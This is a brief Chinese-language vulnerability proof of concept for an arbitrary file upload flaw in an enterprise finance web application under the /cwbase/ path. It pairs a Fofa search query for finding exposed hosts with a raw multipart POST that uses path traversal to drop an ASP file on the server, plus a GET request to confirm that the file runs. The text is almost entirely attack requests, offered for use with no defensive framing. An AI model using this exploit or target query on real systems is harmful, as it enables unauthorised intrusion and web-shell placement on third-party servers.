Fofa语法
body="/cwbase/web/gsprtf/"
漏洞POC
POST /cwbase/EP/ListContent/UploadListFile.ashx?uptype=attslib&keyid=1&key1=1&key2=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Content-Length: 273
Accept: /
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------rww5upkbw6ctf0tu5hye

-----------------------------rww5upkbw6ctf0tu5hye
Content-Disposition: form-data; name="file"; filename="../../../../../../j1gcettjkv.asp"
Content-Type: image/png

<% response.write("2lN0nxVzC7jYTvuIOcbWyy2AwsK")%>
-----------------------------rww5upkbw6ctf0tu5hye--

上传文件定位：
GET /cwbase/j1gcettjkv.asp HTTP/1.1


响应代码特征
200
响应内容特征